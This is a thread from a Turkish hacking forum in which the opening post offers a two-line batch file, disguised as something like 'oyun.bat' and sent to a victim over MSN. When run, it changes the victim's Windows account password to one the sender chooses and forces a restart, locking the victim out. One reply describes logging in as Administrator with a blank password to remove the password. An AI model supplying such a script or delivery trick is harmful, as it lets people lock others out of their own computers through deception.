Karşı Pc ye Şifre Koy Çok Kolay

aslan51

Katılımcı Üye
Msn den karsındakı pc ye sıfre koyabılırsın
arkladaslar cok basıt bılenler vardır ama bılmeyenler ıcın gusel bısey
ilk olarak yeni metin belgesi açıyoruz
sonrada verdiğim kodları yazıyoruz ve uzantısını .bat olarak kaydediyoruz (örnek: oyun.bat)
code:

net user %username% 123456
shutdown -r

bu komutta 123456 yazılı kısım kişinin pc ye koyacagımız şifredir siz deiştirip istediğiniz bir şifreyi koyabilirsiniz
şimdii gelelim kullanıma
verdiğim komutları yazıp .bat olarak kaydetikten sonra oluşan programı msnden karşıtarafa bişekile kabul ettirip yolluyorsunuz adam alınca çıft tıkladığı anda pc'ye şifre yerleşiyor ve pc otomatik olarak kapanıyor bu kapamayı kişi durduramaz
görev yönrticisini bile açsa durduramaz zaten durdursa bile şifre çoktan yerleşmişolur pc'yi kendisi kapadığıanda şifreleniraçıldığında parola sorar bilen açar bilemeyen açamaz

100%100 calısıyor

ComeForYou

Yeni üye
11 May 2009
3
0
peki biz çift tıklarsak bizim pc yede şifre girermi girse bile şifreyi biliyozda meraktan sordum

By-X

Yeni üye
20 Nis 2009
3
0
Şifresini UnutanLar İçinde Bi Önerim Var PC Şifre Sorgu Yerine GeLince Orada CtrL+ALT+DeLete Yapıp Çıkan Giriş ADına Administrator Yazıp Password Yerini İse Boş Bırakıyorsunuz PC YE Giriyor Daha Sonra BaşLat+AyarLar+Denetim Masası + KuLLanıcı HesapLarını TIkLıyorsunuz Ordan ParoLamı KaLdır Seçenegine BAsıyorsunuz KaLdırırken Eski Şifreyi Sormuyor Zaten KaLdırdıktan Sonra Pc Res Atın NormaL Bi ŞekiLde AçıLacaktır Ve BöyLece Sorundanda KurtuLmuş OLursunuz....

TalesTR

Üye
7 May 2009
75
0
hakket çok kez verildi ben bu sitede yaklasık 2 yıl öncede wardım farklı bir nickle 2 yıl öncede bu konu warDI:D:D

KeNess

Katılımcı Üye
4 Nis 2009
319
2
Utrecht / N.L
bir çok kez koyulmuş olabilir isteyen baksın istemeyen bakmasın yeni başlayan arkadaşlara yardımcı olmak için yapıyoruz sürekli tekrar etmenize gerek yok.

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.